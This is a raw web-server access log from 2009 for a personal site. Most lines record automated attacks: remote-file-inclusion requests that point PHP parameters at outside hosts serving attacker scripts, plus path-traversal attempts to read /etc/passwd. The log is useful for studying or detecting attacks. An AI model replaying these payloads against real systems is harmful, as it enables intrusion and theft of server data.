121.165.73.157 - - [28/Apr/2009:11:41:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:41:12 -0700] "GET /logs/access_071122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:41:12 -0700] "GET /logs/access_071123.log/inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:11:41:31 -0700] "GET /logs/access_080626.log/index.php?url=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:41:59 -0700] "GET /logs/access_080322.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:42:08 -0700] "GET /logs/access_080215.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:19 -0700] "GET /logs/access_090104.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:19 -0700] "GET /bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:19 -0700] "GET /logs//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:20 -0700] "GET /logs/access_071122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:20 -0700] "GET /logs/access_071123.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:22 -0700] "GET /logs/access_090213.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:25 -0700] "GET /logs/access_090104.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:26 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:26 -0700] "GET /bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:27 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:27 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:33 -0700] "GET /logs/access_090213.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:34 -0700] "GET /logs/access_071122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:34 -0700] "GET /logs/access_071123.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:36 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:36 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:42:37 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:41 -0700] "GET /logs/access_090104.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:41 -0700] "GET /bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:42 -0700] "GET /logs//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:42:50 -0700] "GET /logs/access_080320.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:42:50 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.189 - - [28/Apr/2009:11:42:54 -0700] "GET /logs/access_070828.log HTTP/1.0" 200 86379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:56 -0700] "GET /logs/access_090104.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:57 -0700] "GET /bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:42:57 -0700] "GET /logs//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:43:09 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:43:09 -0700] "GET /logs/access_080320.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.10.54 - - [28/Apr/2009:11:43:46 -0700] "GET /logs/access_071214.log///skin/zero_vote/error.php?%20dir=http://xplcc.t35.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:44:06 -0700] "GET /logs/access_090213.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:44:22 -0700] "GET /logs/access_090213.log//bbshop/admin/admin.php?_shop_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:44:27 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:44:27 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:44:27 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.10.54 - - [28/Apr/2009:11:44:37 -0700] "GET /logs/access_080331.log///skin/zero_vote/error.php?%20dir=http://xplcc.t35.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:44:45 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:44:51 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 97193 "-" "libwww-perl/5.823" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:44:54 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:44:54 -0700] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:44:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:44:59 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:10 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:10 -0700] "GET /errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:10 -0700] "GET /logs/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:45:11 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:18 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:45:19 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.30.81.189 - - [28/Apr/2009:11:45:26 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 23344 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:45:32 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:45:32 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:45:32 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:45:32 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:45:44 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:45:44 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:45:44 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:45:45 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:45:45 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:45:45 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:45:45 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:49 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 200 43288 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:50 -0700] "GET /logs/access_081101.log//errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:45:50 -0700] "GET /errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:46:00 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 500 292 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
90.156.148.214 - - [28/Apr/2009:11:46:06 -0700] "GET /logs/index.php?pg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.148.214 - - [28/Apr/2009:11:46:06 -0700] "GET /logs/access_090106.log%20%20/index.php?pg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:46:14 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:46:14 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:46:15 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:46:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:46:23 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:46:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:46:47 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
90.156.148.214 - - [28/Apr/2009:11:46:55 -0700] "GET /index.php?pg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 200 43343 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:46:59 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:47:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:47:46 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:47:46 -0700] "GET /logs/access_080831.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:47:46 -0700] "GET /logs/access_081007.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:47:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:48:17 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:48:21 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:48:21 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:48:21 -0700] "GET /logs/access_080322.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:48:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:48:27 -0700] "GET /logs/access_080215.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:48:42 -0700] "GET /logs/access_080511.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:48:43 -0700] "GET /logs/access_080223.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:49:00 -0700] "GET /?path%5Bdocroot%5D=http://www.wizard.com.br/id.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.823" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:49:00 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:49:05 -0700] "GET /12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:49:05 -0700] "GET /logs/access_080305.log%20%20/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:49:05 -0700] "GET /logs/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:11 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:11 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:11 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:17 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:17 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:17 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:49:17 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:49:31 -0700] "GET /logs/access_090130.log%20%20/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.189 - - [28/Apr/2009:11:49:38 -0700] "GET /logs/access_090127.log HTTP/1.0" 200 2814490 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:49:53 -0700] "GET /logs/access_080929.log//errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:49:53 -0700] "GET /errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:49:53 -0700] "GET /logs//errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:49:53 -0700] "GET /logs/access_080918.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.148.214 - - [28/Apr/2009:11:50:11 -0700] "GET /logs/access_081210.log%20%20/index.php?pg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:50:20 -0700] "GET /logs/access_090318.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:50:30 -0700] "GET /logs/access_080401.log%20%20//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:50:30 -0700] "GET /logs/access_090214.log//errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:11:50:38 -0700] "GET /logs/access_080831.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:11:50:41 -0700] "GET /logs/access_081209.log/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:50:47 -0700] "GET /logs/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:50:47 -0700] "GET /12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:50:47 -0700] "GET /logs/access_080305.log%20%20/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
